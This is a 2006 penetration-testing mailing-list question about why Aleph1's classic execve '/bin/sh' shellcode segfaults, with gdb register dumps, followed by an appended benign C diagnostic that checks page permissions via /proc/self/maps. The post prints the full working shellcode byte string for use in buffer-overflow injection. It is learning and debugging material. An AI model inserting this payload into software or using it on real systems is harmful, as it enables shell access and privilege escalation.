Penetration Testing mailing list archives
Shellcode itself segfaults
From: Paul Sebastian Ziegler <psz () observed de>
Date: Mon, 19 Jun 2006 21:06:45 +0200
Hi,

I recently ran into a problem while exploring overflowing mechanisms. The overflowing itself is working just fine. But now I am at the point where I want to actually inject code into my test applications, so I started searching for shellcodes to play with. Now when I use codes for playing around (e.g. opening the cd-drive) everything works just fine. However, as soon as anything actually invokes a shell, thus becoming a real "shellcode", the shellcode itself segfaults.

As an example I have used this code contained in the paper "Buffer Overflows Complete" from http://hackaholic.org :

-------------------------------------------------------------------------------
char main[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
-------------------------------------------------------------------------------

It is the same code that is also used in Aleph1's famous Phrack article 49-14.

Next I compile it successfully:

-------------------------------------------------------------------------------
$ gcc -o sh sh.c
-------------------------------------------------------------------------------

No errors here. However, when trying to run ./sh I get this:

-------------------------------------------------------------------------------
$ ./sh
Speicherzugriffsfehler (Segmentation fault)
-------------------------------------------------------------------------------

I thought of trying to find out what happens here, so I fired up gdb to check out:

-------------------------------------------------------------------------------
$ gdb -q sh
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) run
Starting program: /home/tatsumori/exp/sh
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
(gdb) backtrace
#0  0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
#1  0x080482ad in _start ()
(gdb) info reg
eax            0xa5e17c         10871164
ecx            0xbff2163c       -1074653636
edx            0x1              1
ebx            0xa5bff4         10862580
esp            0xbff215b0       0xbff215b0
ebp            0xbff21608       0xbff21608
esi            0xbff21634       -1074653644
edi            0xbff215c0       -1074653760
eip            0x949e20         0x949e20
eflags         0x10246          66118
cs             0x73             115
ss             0x7b             123
ds             0x7b             123
es             0x7b             123
fs             0x0              0
gs             0x33             51
(gdb)
-------------------------------------------------------------------------------

Ok, so libc seems to be canceling my code here.

This was tested on a Fedora Core 3 machine:

Linux version 2.6.11-1.14_FC3 (bhcompile () bugs build redhat com) (gcc version 3.4.3 20050227 (Red Hat 3.4.3-22)) #1 Thu Apr 7 19:23:49 EDT 2005

I also tested it on my gentoo-box with ssp and pie. Here it is impossible to actually smash the stack, however the shellcode itself works.

-------------------------------------------------------------------------------
% gcc -o sh sh.c
% ./sh
sh-3.1$ exit
-------------------------------------------------------------------------------

Linux version 2.6.16-hardened-r6r4h (root@localhost) (gcc バージョン 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)) #10 PREEMPT Wed Jun 14 23:09:30 CEST 2006

However, this is only true as long as I don't use setuid-code. Once I do this I get exactly the same segfault on this box too.

I got the feeling that this is some kind of (maybe too) well known standard problem, so I tried google. However, the only keywords I could come up with (e.g. "shellcode setuid segfault") are contained in every single overflowing paper, so I got 100,000+ results with the first 300 being tutorials that didn't contain anything useful for me.

I would greatly appreciate it if someone could tell me what is going on here. Or maybe give me the name/URL of some paper handling this or giving me the right keyword to search for myself.

Thanks a lot in advance!
MfG Paul
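A diagnostic that is useful when a byte array placed in a data section is later executed, as the poster's char main[] is: check which permissions the kernel actually gave the page holding that address before guessing at the cause. The program below is an added example, not code from the post or from any reply in the thread, and it does not claim to be the thread's diagnosis. It parses the text of /proc/self/maps (a Linux-only assumption) and reports whether a given address lies in an executable mapping; the SAMPLE_MAPS text is a constructed 32-bit layout with illustrative addresses, and the live_perms() helper runs the same lookup on the process's own map, so a reader can compare the permissions of a function in .text with those of a char array in .data on their own system.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample of a 32-bit /proc/self/maps (not taken from the post):
 * text segment r-x, data segment rw-, stack rw-. Addresses are illustrative. */
static const char SAMPLE_MAPS[] =
    "08048000-08049000 r-xp 00000000 03:02 12345      /home/user/exp/sh\n"
    "08049000-0804a000 rw-p 00000000 03:02 12345      /home/user/exp/sh\n"
    "bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]\n";

/* Parse one maps line of the form "start-end perms offset dev inode [path]".
 * Returns 1 and fills start/end/perms (four chars, e.g. "r-xp") on success, else 0. */
static int parse_maps_line(const char *line, uintptr_t *start, uintptr_t *end,
                           char perms[5])
{
    unsigned long long s, e;
    if (sscanf(line, "%llx-%llx %4s", &s, &e, perms) != 3)
        return 0;
    *start = (uintptr_t)s;
    *end = (uintptr_t)e;
    return 1;
}

/* Find the mapping that contains addr in a maps text (real or constructed).
 * Returns 1 and fills perms when found, 0 with perms = "" otherwise. */
int perms_in_maps(const char *maps, uintptr_t addr, char perms[5])
{
    const char *cur = maps;
    while (*cur) {
        const char *nl = strchr(cur, '\n');
        size_t len = nl ? (size_t)(nl - cur) : strlen(cur);
        char line[512];
        uintptr_t s, e;
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, cur, len);
        line[len] = '\0';
        if (parse_maps_line(line, &s, &e, perms) && addr >= s && addr < e)
            return 1;
        if (!nl)
            break;
        cur = nl + 1;
    }
    perms[0] = '\0';
    return 0;
}

/* 1 if the mapping containing addr carries the execute bit, 0 if it does not
 * or if addr is not mapped at all. */
int addr_is_executable(const char *maps, uintptr_t addr)
{
    char perms[5];
    return perms_in_maps(maps, addr, perms) && perms[2] == 'x';
}

/* Live variant: inspect this process's own map. Returns -1 when /proc is not
 * available, otherwise the result of perms_in_maps(). */
int live_perms(uintptr_t addr, char perms[5])
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");
    size_t n;
    if (!f)
        return -1;
    n = fread(buf, 1, sizeof buf - 1, f);
    buf[n] = '\0';
    fclose(f);
    return perms_in_maps(buf, addr, perms);
}

/* Placeholder byte array living in .data; it stands in for a char main[]
 * array and deliberately holds no machine code. */
static char data_buf[] = "placeholder bytes, not shellcode";

int main(void)
{
    char p[5];
    int r = live_perms((uintptr_t)main, p);
    printf("main     (in .text): %s\n", r == 1 ? p : "unknown");
    r = live_perms((uintptr_t)data_buf, p);
    printf("data_buf (in .data): %s\n", r == 1 ? p : "unknown");
    return 0;
}
```

Running the binary prints the permission string of the page holding main and of the page holding data_buf; a missing x in the second line is the fact to record before reading further into the crash, since a jump into such a page faults regardless of what the bytes are. The parser is kept separate from the /proc read so it can be exercised on a constructed map text where /proc is not mounted.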